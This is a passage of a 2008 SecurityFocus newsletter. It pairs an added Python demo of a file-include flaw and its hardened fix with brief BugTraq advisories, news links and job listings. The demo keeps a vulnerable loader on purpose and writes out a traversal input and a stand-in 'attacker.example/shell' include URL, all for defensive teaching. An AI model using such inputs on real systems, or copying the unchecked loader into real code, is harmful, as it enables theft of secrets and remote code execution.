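The txtCMS and Admidio entries (local file include via directory traversal) and the PhpBlock entry earlier in this issue (remote file include) share one cause: a request parameter chooses which file the application includes. The block below is an added example of that pattern beside a hardened version; it is not code from any of those projects. The page names, the `.txt` suffix and the directory layout are assumptions made for the demonstration.

```python
import os
import tempfile

# Hypothetical page names the application is willing to include. The allowlist
# is the primary control; the path check below is defence in depth.
ALLOWED_PAGES = {"home", "about", "contact"}


def load_page_vulnerable(base_dir, page):
    """The advisory pattern: the request parameter is joined onto a directory and
    the result is included as-is. A '../' sequence walks out of base_dir; in PHP
    with allow_url_include enabled an 'http://' value would fetch attacker code.
    Appending a fixed extension, as here, was a common mitigation that PHP
    versions before 5.3.4 let an attacker bypass with a %00 null byte."""
    with open(os.path.join(base_dir, page + ".txt")) as fh:
        return fh.read()


def load_page_hardened(base_dir, page):
    """Reject anything not in the allowlist, then confirm the resolved path still
    lies inside base_dir (catches symlinks and any future allowlist mistake)."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % page)
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, page + ".txt"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes page directory: %r" % path)
    with open(path) as fh:
        return fh.read()


def _attempt(func, base_dir, page):
    """Return the file contents, or 'rejected' if the loader refused or failed."""
    try:
        return func(base_dir, page)
    except (ValueError, OSError):
        return "rejected"


def demo():
    """Constructed layout: <tmp>/pages/home.txt is a legitimate page and
    <tmp>/config.txt is a secret one level above the page directory."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "home.txt"), "w") as fh:
            fh.write("welcome")
        with open(os.path.join(tmp, "config.txt"), "w") as fh:
            fh.write("db_password=hunter2")
        return {
            "vulnerable_home": _attempt(load_page_vulnerable, pages, "home"),
            "vulnerable_traversal": _attempt(load_page_vulnerable, pages, "../config"),
            "hardened_home": _attempt(load_page_hardened, pages, "home"),
            "hardened_traversal": _attempt(load_page_hardened, pages, "../config"),
            "hardened_remote": _attempt(load_page_hardened, pages, "http://attacker.example/shell"),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-22s %s" % (name, value))
```

The traversal string reads the secret through the vulnerable loader and is rejected by the hardened one, as is a remote URL, because neither is an allowlisted name. Where the set of includable files is not fixed at development time, the `realpath` containment check alone is the minimum, and the server should additionally run with `allow_url_include` (and ideally `allow_url_fopen`) disabled so a traversal bug cannot be upgraded to remote code execution.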

98. Red Hat Directory Server LDAP Query Patterns Buffer Overflow Vulnerability
BugTraq ID: 29126
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29126
Summary:
Red Hat Directory Server is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data when processing LDAP queries.

Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.

99. ZoneMinder Multiple Unspecified Remote Code Execution Vulnerabilities
BugTraq ID: 28968
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28968
Summary:
ZoneMinder is prone to multiple unspecified remote code-execution vulnerabilities.

Successful exploits allow remote, authenticated attackers to execute arbitrary script code with the privileges of the webserver user. This may facilitate the remote compromise of the underlying operating system.

Versions prior to ZoneMinder 1.23.3 are vulnerable.

100. SIPp 'call.cpp' Remote Buffer Overflow Vulnerability
BugTraq ID: 28884
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28884
Summary:
SIPp is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

The issue affects SIPp 3.0; other versions may also be affected.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Groups warn travelers to limit laptop data
By: Robert Lemos
In a letter to Congress, nearly three dozen organizations protest the seizures of electronic devices by U.S. customs officials, an act upheld by a federal appeals court in a recent ruling.
http://www.securityfocus.com/news/11516

2. Patches pose significant risk, researchers say
By: Robert Lemos
A group of four computer scientists say Windows Update -- and other patch services -- should be redesigned, after creating a technique to quickly produce attack code from a distributed patch.
http://www.securityfocus.com/news/11514

3. U.S. gov't pushes cybersecurity at con
By: Robert Lemos
Top Bush Administration officials descend on the RSA Security Conference laying out their plans for protecting critical networks and giving a small taste of the latest national cyber exercise, Cyber Storm II.
http://www.securityfocus.com/news/11513

4. Web developers, fix thy Flash
By: Robert Lemos
Flaws that allow cross-site scripting attacks through Adobe Flash files could let attackers compromise online accounts and local networks. Yet, Web publishers have been slow to fix their sites, a security researcher says.
http://www.securityfocus.com/news/11511

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Quality Assurance, Alpharetta
http://www.securityfocus.com/archive/77/492026

2. [SJ-JOB] Security Researcher, Centreville, VA
http://www.securityfocus.com/archive/77/492037

3. [SJ-JOB] Forensics Engineer, Arlington
http://www.securityfocus.com/archive/77/492038

4. [SJ-JOB] Sr. Product Manager, San Jose
http://www.securityfocus.com/archive/77/492023

5. [SJ-JOB] Application Security Engineer, New York
http://www.securityfocus.com/archive/77/492024

6. [SJ-JOB] Security Auditor, South Portland
http://www.securityfocus.com/archive/77/492025

7. [SJ-JOB] Application Security Engineer, Philadelphia
http://www.securityfocus.com/archive/77/492036

8. [SJ-JOB] Sales Representative, San Jose
http://www.securityfocus.com/archive/77/492039

9. [SJ-JOB] Security Architect, South Portland
http://www.securityfocus.com/archive/77/492022

10. [SJ-JOB] Security Consultant, Mission Viejo
http://www.securityfocus.com/archive/77/491781

11. [SJ-JOB] Security Consultant, Dallas
http://www.securityfocus.com/archive/77/491782

12. [SJ-JOB] Security Consultant, Chicago
http://www.securityfocus.com/archive/77/491784

13. [SJ-JOB] Security Consultant, Various
http://www.securityfocus.com/archive/77/491785

14. [SJ-JOB] Forensics Engineer, Mission Viejo
http://www.securityfocus.com/archive/77/491780

15. [SJ-JOB] Security Consultant, Calgary
http://www.securityfocus.com/archive/77/491783

V. INCIDENTS LIST SUMMARY
---------------------------
1. Distributed Bruteforce against SSH
http://www.securityfocus.com/archive/75/491953

2. Possible Zombie/Bot?
http://www.securityfocus.com/archive/75/491947

3. Malware IRC/DNS Network Activity
http://www.securityfocus.com/archive/75/491834

4. Weird SSH attack last night and this morning (still ongoing)
http://www.securityfocus.com/archive/75/491739

VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. XP Hardening
http://www.securityfocus.com/archive/88/492001

2. SecurityFocus Microsoft Newsletter #393
http://www.securityfocus.com/archive/88/491763

3. Binding Windows Services to Specific Addresses Only
http://www.securityfocus.com/archive/88/491595

VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe@securityfocus.com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@securityfocus.com and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Solidcore Systems Inc.

PCI DSS Compliance for $50/Node
The QSA's choice for low-cost automation of 30 PCI DSS controls on servers, databases, and network devices.
Watch the Demo now! http://www.solidcore.com/landing_pages/PCI_Tour_sf.html
